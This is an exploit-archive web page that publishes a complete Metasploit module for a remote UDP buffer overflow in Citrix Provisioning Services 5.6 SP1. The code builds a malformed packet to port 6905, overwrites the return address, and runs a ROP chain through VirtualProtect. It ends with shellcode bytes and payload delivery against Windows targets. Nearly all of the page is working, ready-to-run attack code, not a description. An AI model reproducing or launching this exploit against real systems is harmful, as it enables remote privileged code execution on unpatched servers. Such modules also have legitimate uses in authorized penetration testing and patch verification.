what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow

Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow
Posted Feb 10, 2012
Authored by AbdulAziz Hariri | Site metasploit.com

This Metasploit module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2, Windows 7, and Windows XP SP3.

tags | exploit, remote, overflow, udp
systems | windows
advisories | OSVDB-75780
SHA-256 | 5d732951640be5f0d7a3bbb2123ba314dbfea24dfb6b7fe3d4aa47cf4fcea31a

Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow

Change Mirror Download
##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Udp

def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow in the Citrix Provisioning Services
5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the
6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,
Windows 7, and Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AbdulAziz Hariri', # Initial discovery via ZDI
'alino <26alino[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>
[
['OSVDB', '75780'],
['BID', '49803'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-009'],
['URL', 'http://support.citrix.com/article/CTX130846']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'BadChars' => "\x00",
'EncoderOptions' => {'BufferRegister'=>'ECX'},
},
'Platform' => ['win'],
'Targets' =>
[
[ 'Citrix Provisioning Services 5.6 SP1',
{
'Offset' => 2012,
'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Nov 04 2011', #CTX130846 creation date
'DefaultTarget' => 0))

register_options([Opt::RPORT(6905)], self.class)
end

def exploit

packet = "\x00\x00\x02\x40" # DATA MSG
packet << rand_text_alpha_upper(18)
packet << "\x00\x00\x00\x00" # Length
packet << rand_text_alpha_upper(target['Offset'])
packet << [target.ret].pack('V')

rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe

rop_gadgets =
[
0x0045b141, # POP EAX; RETN streamprocess.exe
0x1009a1bc, # VirtualProtect()
0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe
0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe
0x004ad0cf, # POP EBP; RETN streamprocess.exe
0x00455d9d, # PUSH ESP; RETN streamprocess.exe
0x00497f5a, # POP EAX; RETN streamprocess.exe
0xfffff9d0, # dwSize
0x00447669, # NEG EAX; RETN streamprocess.exe
0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe
0x00426305, # POP ECX; RETN streamprocess.exe
0x00671fb9, # lpflOldProtect
0x004e41e6, # POP EDI; RETN streamprocess.exe
0x0040f004, # RETN streamprocess.exe
0x00495c05, # POP EAX; RETN streamprocess.exe
0xffffffc0, # flNewProtect
0x0042c79a, # NEG EAX; RETN streamprocess.exe
0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe
0x0045c1fa, # POP EAX; RETN streamprocess.exe
0x90909090, # NOP
0x00435bbe, # PUSHAD; RETN streamprocess.exe
].pack("V*")

packet[258, rop_nop.length] = rop_nop
packet[410, rop_gadgets.length] = rop_gadgets
packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff"
packet[504, payload.encoded.length] = payload.encoded

print_status("Trying target #{target.name}...")

connect_udp
udp_sock.put(packet)

handler
disconnect_udp
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close